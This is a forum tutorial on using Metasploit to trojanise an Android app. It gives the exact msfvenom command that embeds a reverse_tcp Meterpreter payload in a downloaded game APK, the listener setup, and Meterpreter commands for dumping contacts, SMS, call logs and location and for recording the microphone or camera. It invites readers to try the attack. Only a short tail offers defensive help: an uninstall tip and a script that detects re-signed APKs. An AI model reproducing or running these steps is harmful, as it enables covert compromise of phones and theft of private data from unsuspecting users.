
Metasploit: Android Session

Discussion in 'Linux Security' started by Jarret W. Buse, Aug 30, 2015.


    In previous articles, I have covered how to access a Windows system as well as a Linux system. What if you wanted to gain access to the most widely deployed Operating System (OS)? In this article, I will cover the process of gaining access to an Android system, which includes tablets and phones.

    Similar to the Linux Session article, this article will cover creating a Trojan to gain access to an Android system.

    First, I will go over how to create the Trojan and then discuss how to get the Trojan onto Android systems. Network Administrators can use this to learn how the process works and to train their users on how to avoid installing Trojans. The result of getting a Trojan onto an Android system is that others can gain access to the device. On a phone, that access allows the downloading of the contact list, text messages and a listing of phone calls sent and received.

    To start, you need an existing Android Application Package (APK). Find one which seems to be popular and which definitely requires network access. A game which talks to a server usually works well, but this is not required. Get the APK file and download it to your system. For this example, I will use “Angry Birds Rio”. APK files can be downloaded from www.apk4fun.com and saved to your PC. Save the APK file in a folder that is easy to reach. In my example, I saved it to my Desktop (/home/jarret/Desktop/).

    The command to run is “msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.2.201 LPORT=3333 -x /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com.apk R -o /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com-Out.apk”. Let's go over the parameters so you understand how it works.

    The options are as follows:

    • -a – architecture of the file being created (depends on the platform). Available values:
      • sparc
      • x86
      • x86_64
      • armle
      • cbea
      • cbea64
      • dalvik
      • java
      • mipsbe
      • mipsle
      • ppc
      • ppc64
      • cmd
      • tty
      • x64
    • --platform – platform of the target system. Available values:
      • AIX
      • Android
      • BSD
      • BSDi
      • Firefox
      • Java
      • Linux
      • Netware
      • NodeJS
      • OSX
      • PHP
      • Python
      • Ruby
      • Solaris
      • UNIX
      • Windows
    • -p – payload to use against the target
    • -x – template (the existing APK) to use
    • -o – output file path
    • R – format of the output file (raw)

    NOTE: Be sure to set LHOST and LPORT correctly. LHOST is the IP address of the system on which Metasploit will be running and listening for the Android device to connect back. LPORT is the port on that system to which the device will connect. Keep note of these values, because the same ones must be used when the listener is started later.

    Once the command completes, you should have a new APK file. Next, the APK file has to reach the user of the Android device and be installed on it. By the time the APK is installed and run, the Meterpreter listener should already be running so that the device can connect back to it.

    NOTE: Be aware that a virus scanner such as Avira can detect the Trojan APK file.

    Before moving on to starting Metasploit, let's look at another method of creating the Trojan in a Graphical User Interface (GUI). Open your browser and connect to the Metasploit web interface on the port specified during installation. The default port is 3790. On my system, I connect to https://192.168.2.201:3709/ and log in using the account created when Metasploit was installed. Once logged in, I can choose the icon for “Payload Generator” as shown in Figure 1.

    FIGURE 1: the “Payload Generator” icon in the Metasploit web interface

    When the “Payload Generator” starts, select “Classic Payload” at the top of the window. Specify the “Platform” as Android and notice that the “Architecture” option disappears. The architecture for Android is Dalvik, and since it is the only option it does not need to be selected. The “Stager” is set to “reverse_tcp” with the stage set to “android/meterpreter”. Set your LHOST and LPORT for the Meterpreter session as needed. The options are shown in Figure 2.

    FIGURE 2: Payload Generator settings for an Android reverse_tcp payload

    Next, select the “Output Options” and set the type of output to “Raw Bytes” as shown in Figure 3. The APK file is not an executable, but a compressed package with installation instructions, similar in role to a “.deb” or “.rpm” file. Click “Generate” so the file can be created; you can then download the file and specify where to save it. Now you need to get it onto the Android device and install it there.

    FIGURE 3: Output Options with the type set to “Raw Bytes”

    To start Meterpreter listening for the “infected” systems, run the following in the Metasploit console (LHOST and LPORT must match the values used when the APK was generated):
    • use exploit/multi/handler
    • set PAYLOAD android/meterpreter/reverse_tcp
    • set LHOST 192.168.2.201
    • set LPORT 3333
    • exploit

    NOTE: The handler module lives under “multi” because it is not tied to a single platform: Metasploit will listen for connections from any system or device that contacts LHOST, whatever its Operating System (OS).

    Metasploit should now be listening for a response from any Trojans that become active. Once the Target Host has created the session back to Metasploit, you can then start accessing the Android device.

    The available commands which can be used in Meterpreter are as follows:

    Core Commands
    =============


    ? - Help menu
    background - Backgrounds the current session
    bgkill - Kills a background meterpreter script
    bglist - Lists running background scripts
    bgrun - Executes a meterpreter script as a background thread
    channel - Displays information about active channels
    close - Closes a channel
    disable_unicode_encoding - Disables encoding of unicode strings
    enable_unicode_encoding - Enables encoding of unicode strings
    exit - Terminate the meterpreter session
    get_timeouts - Get the current session timeout values
    help - Help menu
    info - Displays information about a Post module
    interact - Interacts with a channel
    irb - Drop into irb scripting mode
    load - Load one or more meterpreter extensions
    machine_id - Get the MSF ID of the machine attached to the session
    quit - Terminate the meterpreter session
    read - Reads data from a channel
    resource - Run the commands stored in a file
    run - Executes a meterpreter script or Post module
    set_timeouts - Set the current session timeout values
    sleep - Force Meterpreter to go quiet, then re-establish session.
    transport - Change the current transport mechanism
    use - Deprecated alias for 'load'
    uuid - Get the UUID for the current session
    write - Writes data to a channel


    Stdapi: File system Commands
    ============================


    cat - Read the contents of a file to the screen
    cd - Change directory
    download - Download a file or directory
    edit - Edit a file
    getlwd - Print local working directory
    getwd - Print working directory
    lcd - Change local working directory
    lpwd - Print local working directory
    ls - List files
    mkdir - Make directory
    pwd - Print working directory
    rm - Delete the specified file
    rmdir - Remove directory
    search - Search for files
    upload - Upload a file or directory


    Stdapi: Networking Commands
    ===========================


    ifconfig - Display interfaces
    portfwd - Forward a local port to a remote service
    route - View and modify the routing table


    Stdapi: System Commands
    ======================


    execute - Execute a command
    getuid - Get the user that the server is running as
    ps - List running processes
    shell - Drop into a system command shell
    sysinfo - Gets information about the remote system, such as OS


    Stdapi: Webcam Commands
    =======================


    record_mic - Record audio from the default microphone for X seconds
    webcam_chat - Start a video chat
    webcam_list - List webcams
    webcam_snap - Take a snapshot from the specified webcam
    webcam_stream - Play a video stream from the specified webcam


    Android Commands
    ================


    check_root - Check if device is rooted
    dump_calllog - Get call log
    dump_contacts - Get contacts list
    dump_sms - Get sms messages
    geolocate - Get current lat-long using geolocation


    Depending on the Android Device, some commands may not work.

    Try this out on an Android Device and see how simple it is to attack an Android Device and get data from the device.

    NOTE: To find the Trojan app on the device, look for the installed program called “MainActivity” and uninstall it.
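    The two clues the article gives for spotting the Trojan (a scanner flagging the APK, and the “MainActivity” app on the device) can be checked from the APK itself. The following triage script is an added example and is not code from the article or from Metasploit: it opens an APK as the ZIP archive it is, hashes the signing-certificate entries, and scans the dex code for the package name used by Metasploit's Android stager. The two sample APKs and their certificate blobs are constructed placeholders, not real apps.

```python
import hashlib
import io
import zipfile

# Package path of Metasploit's Android stager inside classes.dex.
# Treat this list as a starting point and extend it with markers from your own samples.
STAGER_MARKERS = [b"com/metasploit/stage"]


def triage_apk(data: bytes) -> dict:
    """Inspect an APK (given as bytes): signer cert hashes, stager markers in dex, MainActivity."""
    findings = {"signers": [], "markers": [], "has_main_activity": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            # v1 signature blocks live under META-INF/; a re-signed APK gets a new certificate.
            if name.startswith("META-INF/") and name.upper().endswith((".RSA", ".DSA", ".EC")):
                findings["signers"].append(hashlib.sha256(blob).hexdigest())
            if name.endswith(".dex"):
                findings["markers"] += [m.decode() for m in STAGER_MARKERS if m in blob]
                # "MainActivity" alone is weak evidence: it is the default activity name
                # in Android Studio projects, so many legitimate apps contain it too.
                if b"MainActivity" in blob:
                    findings["has_main_activity"] = True
    return findings


def signer_changed(original: bytes, candidate: bytes) -> bool:
    """True if the candidate APK is signed by a different certificate than the original."""
    return set(triage_apk(original)["signers"]) != set(triage_apk(candidate)["signers"])


def build_sample_apk(dex_body: bytes, signer_blob: bytes) -> bytes:
    """Constructed sample: a minimal ZIP with the layout of an APK (not an installable app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<constructed placeholder>")
        z.writestr("classes.dex", b"dex\n035\x00" + dex_body)
        z.writestr("META-INF/CERT.RSA", signer_blob)
    return buf.getvalue()


# Constructed inputs: a vendor-signed app, and the same app rebuilt with the stager and re-signed.
CLEAN_APK = build_sample_apk(b"Lcom/example/game/MainActivity;", b"vendor-cert-placeholder")
TROJAN_APK = build_sample_apk(
    b"Lcom/example/game/MainActivity;Lcom/metasploit/stage/Payload;", b"selfsigned-placeholder")

if __name__ == "__main__":
    for label, apk in (("clean", CLEAN_APK), ("suspect", TROJAN_APK)):
        print(label, triage_apk(apk))
    print("signer changed:", signer_changed(CLEAN_APK, TROJAN_APK))
```

A signing-certificate mismatch against the store copy of the same app is the stronger signal here, since rebuilding an APK with an injected payload always requires re-signing it.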
    Last edited: Sep 3, 2015